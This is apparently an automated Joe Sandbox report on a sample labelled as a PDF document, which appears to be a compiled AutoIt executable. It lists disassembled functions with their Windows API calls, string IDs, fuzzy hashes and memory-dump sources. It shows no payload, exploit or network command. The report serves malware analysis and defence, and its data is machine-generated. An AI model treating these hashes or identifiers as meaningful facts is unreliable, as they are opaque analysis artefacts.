                                                            • Instruction ID: d7e31ad4e385e60aa79bd59451a4e3ed3b840b4ad63a4b04ec850d00eeedc976
                                                            • Opcode Fuzzy Hash: 0a137884f649879d6b99fd9b9e1d54a6c694ab1527c332bf93eccae373ea4867
                                                            • Instruction Fuzzy Hash: 3CE16071940219ABDF21DF64CC88EEE7BB9FF15720F108159F91DAA290DB708A85DF60
                                                            Function 00174B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00174C51
                                                            • GetDesktopWindow.USER32 ref: 00174C66
                                                            • GetWindowRect.USER32(00000000), ref: 00174C6D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00174CCF
                                                            • DestroyWindow.USER32(?), ref: 00174CFB
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00174D24
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00174D42
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00174D68
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00174D7D
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00174D90
                                                            • IsWindowVisible.USER32(?), ref: 00174DB0
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00174DCB
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00174DDF
                                                            • GetWindowRect.USER32(?,?), ref: 00174DF7
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00174E1D
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00174E37
                                                            • CopyRect.USER32(?,?), ref: 00174E4E
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00174EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 47051f7fa2e2edae1571ef553a589922f61021752a9283c55b4e50a59c8e807b
                                                            • Instruction ID: 95018eb7d4eb05584dbd1eb9fda5a538af4f5efc8dead46074a0482a0a856d76
                                                            • Opcode Fuzzy Hash: 47051f7fa2e2edae1571ef553a589922f61021752a9283c55b4e50a59c8e807b
                                                            • Instruction Fuzzy Hash: 07B14571608341AFDB04DF64C849B6ABBF4BB88710F00891DF5999B2A2DB75EC45CB92
                                                            Function 001546D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001546E8
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0015470E
                                                            • _wcscpy.LIBCMT ref: 0015473C
                                                            • _wcscmp.LIBCMT ref: 00154747
                                                            • _wcscat.LIBCMT ref: 0015475D
                                                            • _wcsstr.LIBCMT ref: 00154768
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00154784
                                                            • _wcscat.LIBCMT ref: 001547CD
                                                            • _wcscat.LIBCMT ref: 001547D4
                                                            • _wcsncpy.LIBCMT ref: 001547FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: b048cd2e01f41085ef3eb7b0b4d8d65212e37dd5ac41c7180cf68fa2409a907a
                                                            • Instruction ID: a9d1de3092cf0e28b611e2809f8bfa58f579008be6544df0bd45a610838e2440
                                                            • Opcode Fuzzy Hash: b048cd2e01f41085ef3eb7b0b4d8d65212e37dd5ac41c7180cf68fa2409a907a
                                                            • Instruction Fuzzy Hash: 2E411676A04201BBDB18A7748C43FFF777CDF16710F00407AF908E6182EB70999296A5
                                                            Function 000F27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F28BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 000F28C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000F28EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 000F28F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 000F291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000F2939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000F2949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000F297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000F2990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 000F29AE
                                                            • GetStockObject.GDI32(00000011), ref: 000F29CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 000F29D5
                                                              • Part of subcall function 000F2344: GetCursorPos.USER32(?), ref: 000F2357
                                                              • Part of subcall function 000F2344: ScreenToClient.USER32(001B67B0,?), ref: 000F2374
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000001), ref: 000F2399
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000002), ref: 000F23A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,000F1256), ref: 000F29FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 0be4270845ba5c52c0e8afdaa36f34f8c856967a51d6f7caa5373fea4ebf914f
                                                            • Instruction ID: d56d0b481c6b9a4c643f06fe8de436937c7bccebe73b7e26a20d5e1fd75ea4a3
                                                            • Opcode Fuzzy Hash: 0be4270845ba5c52c0e8afdaa36f34f8c856967a51d6f7caa5373fea4ebf914f
                                                            • Instruction Fuzzy Hash: D8B16C71A0020AEFDB14DFA8DC45BEE7BB5FB18310F108629FA15E7690DB749891DB90
                                                            Function 00174069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 001740F6
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001741B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: e94fff561531a3e4fe819c8a8c561b1e4235ffd389cb327120ad833bebcc60dd
                                                            • Instruction ID: 00adac0aec2f514aae21188c65ad277eb28ddf287086d66e8a56a313d4f1ebaa
                                                            • Opcode Fuzzy Hash: e94fff561531a3e4fe819c8a8c561b1e4235ffd389cb327120ad833bebcc60dd
                                                            • Instruction Fuzzy Hash: 6EA19D302143059BCB18EF20C991ABAB7F5BF95314F15896CB99A9B6D3DB30EC45CB81
                                                            Function 001652F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00165309
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00165314
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0016531F
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 0016532A
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00165335
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00165340
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0016534B
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00165356
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00165361
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0016536C
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00165377
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00165382
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0016538D
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00165398
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 001653A3
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 001653AE
                                                            • GetCursorInfo.USER32(?), ref: 001653BE
                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 001653E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 7e750961182e6ab844fbf3487ae3fee83d1513a893339fba919eff234f55f722
                                                            • Instruction ID: 2d4ad12568443a2137525337f162ce783b14ba5793a3c78f040ec5cd785749da
                                                            • Opcode Fuzzy Hash: 7e750961182e6ab844fbf3487ae3fee83d1513a893339fba919eff234f55f722
                                                            • Instruction Fuzzy Hash: D0415370E043196ADB109FBA8C4996FFFB8EF51B50F10452FA509E7291DBB89441CE61
                                                            Function 0014AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0014AAA5
                                                            • __swprintf.LIBCMT ref: 0014AB46
                                                            • _wcscmp.LIBCMT ref: 0014AB59
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0014ABAE
                                                            • _wcscmp.LIBCMT ref: 0014ABEA
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0014AC21
                                                            • GetDlgCtrlID.USER32(?), ref: 0014AC73
                                                            • GetWindowRect.USER32(?,?), ref: 0014ACA9
                                                            • GetParent.USER32(?), ref: 0014ACC7
                                                            • ScreenToClient.USER32(00000000), ref: 0014ACCE
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0014AD48
                                                            • _wcscmp.LIBCMT ref: 0014AD5C
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0014AD82
                                                            • _wcscmp.LIBCMT ref: 0014AD96
                                                              • Part of subcall function 0011386C: _iswctype.LIBCMT ref: 00113874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 41c86c433f2a70b11168f4e2a97cd9212fb9f0ff9d3da84fad2f4f847084641c
                                                            • Instruction ID: 3bef22fcb8c5f9bff9ab56479f1de57ec5449fd0fe1ab7c0b2a0c3372c3f55de
                                                            • Opcode Fuzzy Hash: 41c86c433f2a70b11168f4e2a97cd9212fb9f0ff9d3da84fad2f4f847084641c
                                                            • Instruction Fuzzy Hash: 48A1D171644306AFDB18DF60C884BEAB7E8FF04315F51462DF9A9C25A0D730E996CB92
                                                            Function 0014B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0014B3DB
                                                            • _wcscmp.LIBCMT ref: 0014B3EC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0014B414
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0014B431
                                                            • _wcscmp.LIBCMT ref: 0014B44F
                                                            • _wcsstr.LIBCMT ref: 0014B460
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0014B498
                                                            • _wcscmp.LIBCMT ref: 0014B4A8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0014B4CF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0014B518
                                                            • _wcscmp.LIBCMT ref: 0014B528
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0014B550
                                                            • GetWindowRect.USER32(00000004,?), ref: 0014B5B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 5e64fb578707602ada0aae35b2652b674691f5306d6b0174e555fe0ebd321c91
                                                            • Instruction ID: a4a2ffcb27be5c9eb5ecfdf50a700c5cbedf00329f6b257a3b0689e6256ff65c
                                                            • Opcode Fuzzy Hash: 5e64fb578707602ada0aae35b2652b674691f5306d6b0174e555fe0ebd321c91
                                                            • Instruction Fuzzy Hash: 7F818E710083099BDB14DF14C8C5FAABBE8FF54314F088569FD899A0A6DB34DD8ACB61
                                                            Function 0014B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: fd21816c460d59a6e9b2e54ef080807b1e9e433f5ddf7efb4773825d867afefa
                                                            • Instruction ID: b42005194b77109cc4b0da320b65cd0ede80e82d5ce30d6dfedbf0ac9b6c8e85
                                                            • Opcode Fuzzy Hash: fd21816c460d59a6e9b2e54ef080807b1e9e433f5ddf7efb4773825d867afefa
                                                            • Instruction Fuzzy Hash: F231D234A08209A6DB18FE60CD83EFE77B8AF25750F600029F515724E7EFA1AE44D552
                                                            Function 0014C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 0014C4D4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0014C4E6
                                                            • SetWindowTextW.USER32(?,?), ref: 0014C4FD
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0014C512
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0014C518
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0014C528
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0014C52E
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0014C54F
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0014C569
                                                            • GetWindowRect.USER32(?,?), ref: 0014C572
                                                            • SetWindowTextW.USER32(?,?), ref: 0014C5DD
                                                            • GetDesktopWindow.USER32 ref: 0014C5E3
                                                            • GetWindowRect.USER32(00000000), ref: 0014C5EA
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0014C636
                                                            • GetClientRect.USER32(?,?), ref: 0014C643
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0014C668
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0014C693
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 85cfc375127db7b9033f3121fcda54fccd6f8d9911db09092fd4918f7f0bbfa3
                                                            • Instruction ID: 7fd746838bff29310548895c274754bdc753900a149da1769d389a54e617760e
                                                            • Opcode Fuzzy Hash: 85cfc375127db7b9033f3121fcda54fccd6f8d9911db09092fd4918f7f0bbfa3
                                                            • Instruction Fuzzy Hash: 53515F70A00709AFDB20DFA8DD85B6FBBB5FF04705F00492CE686A65B0D774A985CB50
                                                            Function 0017A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0017A4C8
                                                            • DestroyWindow.USER32(?,?), ref: 0017A542
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0017A5BC
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0017A5DE
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017A5F1
                                                            • DestroyWindow.USER32(00000000), ref: 0017A613
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000F0000,00000000), ref: 0017A64A
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0017A663
                                                            • GetDesktopWindow.USER32 ref: 0017A67C
                                                            • GetWindowRect.USER32(00000000), ref: 0017A683
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0017A69B
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0017A6B3
                                                              • Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: df29835c9084c1c6eee4d0ee956e055e4eac395721b10fee866c7e8d2ad98d58
                                                            • Instruction ID: 11f309a4618a7641a44dba816f299b3e1b8d29f3832c6595a997c8123106bcaf
                                                            • Opcode Fuzzy Hash: df29835c9084c1c6eee4d0ee956e055e4eac395721b10fee866c7e8d2ad98d58
                                                            • Instruction Fuzzy Hash: 7D718771144205AFD725CF28CC49FAA7BF6EF98700F58852CF989872A1C774E982CB12
                                                            Function 0017C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0017C917
                                                              • Part of subcall function 0017ADF1: ClientToScreen.USER32(?,?), ref: 0017AE1A
                                                              • Part of subcall function 0017ADF1: GetWindowRect.USER32(?,?), ref: 0017AE90
                                                              • Part of subcall function 0017ADF1: PtInRect.USER32(?,?,0017C304), ref: 0017AEA0
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0017C980
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0017C98B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0017C9AE
                                                            • _wcscat.LIBCMT ref: 0017C9DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0017C9F5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0017CA0E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0017CA25
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0017CA47
                                                            • DragFinish.SHELL32(?), ref: 0017CA4E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0017CB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 169749273-3440237614
                                                            • Opcode ID: 9ff2a5a928ebfc5d3d1c83c97cf592e3b4f0f62f28071efec01f9ac2d9ba5ec9
                                                            • Instruction ID: cf4a6c8f4dccd555df5a3f5ae5eab2df5cddb9816ee30ef26cce0cb8429fd3e9
                                                            • Opcode Fuzzy Hash: 9ff2a5a928ebfc5d3d1c83c97cf592e3b4f0f62f28071efec01f9ac2d9ba5ec9
                                                            • Instruction Fuzzy Hash: 1C614B71108304AFC701DF64DC85DAFBBF8EF99710F00492DF699961A2DB709A89CB92
                                                            Function 00174619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 001746AB
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001746F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
